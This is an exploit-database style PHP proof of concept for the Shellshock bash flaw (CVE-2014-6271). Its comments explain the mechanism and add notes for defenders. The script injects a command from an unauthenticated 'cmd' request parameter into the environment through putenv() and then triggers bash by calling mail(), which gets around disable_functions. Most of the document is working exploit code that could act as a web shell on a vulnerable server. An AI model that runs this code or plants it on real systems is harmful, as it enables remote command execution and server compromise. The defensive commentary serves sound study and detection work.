# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
<?php
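/**
 * Proof of concept for CVE-2014-6271 reached through PHP's mail().
 *
 * How the listing works, as far as the code shows:
 *  - It proceeds only when /bin/sh is a symlink whose target contains "bash".
 *  - putenv() stores a value that starts with a bash function definition
 *    ("() { x; };") followed by $cmd, with stdout/stderr redirected to a
 *    temporary file created in the current directory.
 *  - mail() is then called; the original comment points at mail.c:283, where
 *    PHP starts the sendmail binary. A bash vulnerable to CVE-2014-6271 runs
 *    the text after the function definition while importing the environment.
 *  - The temporary file is read back and deleted.
 *
 * Notes for defenders reviewing this listing:
 *  - disable_functions entries for exec/system/etc. do not cover this path;
 *    only putenv() and mail() are used. The root fix is a bash build patched
 *    for CVE-2014-6271; disabling putenv()/mail() where they are not needed
 *    removes this particular route.
 *  - Observable artefacts: an environment value beginning with "() {" in a
 *    PHP worker's children, and short-lived "data*" files created by
 *    tempnam() in the script's working directory.
 *  - Neither return string is a reliable "not vulnerable" verdict: readlink()
 *    fails when /bin/sh is not a symlink, and an empty capture file is
 *    reported the same way as a patched shell.
 *
 * @param string $cmd Text placed, unescaped, after the function definition.
 * @return string Captured output, "Not vuln (not bash)", or
 *                "No output, or not vuln.".
 */
function shellshock($cmd) {
    // Execute a command via CVE-2014-6271 @ mail.c:283
    if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
        $tmp = tempnam(".", "data");
        putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
        // In Safe Mode, the user may only alter environment variables whose names
        // begin with the prefixes supplied by this directive.
        // By default, users will only be able to set environment variables that
        // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
        // PHP will let the user modify ANY environment variable!
        // (Safe Mode was removed in PHP 5.4, so on later 5.x releases this
        // prefix restriction no longer applies at all.)
        mail("a@127.0.0.1", "", "", "", "-bv"); // -bv so we don't actually send any mail
    }
    else return "Not vuln (not bash)";
    // Errors are suppressed here, so a missing or unreadable capture file
    // ends up in the "No output" branch below.
    $output = @file_get_contents($tmp);
    @unlink($tmp);
    if ($output != "") return $output;
    else return "No output, or not vuln.";
}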
// Script entry point: the "cmd" request parameter is handed to shellshock()
// without any validation or authentication check. The return value is not
// echoed or stored, so as written the captured output never reaches the
// HTTP response.
$requestedCommand = $_REQUEST["cmd"];
shellshock($requestedCommand);
?>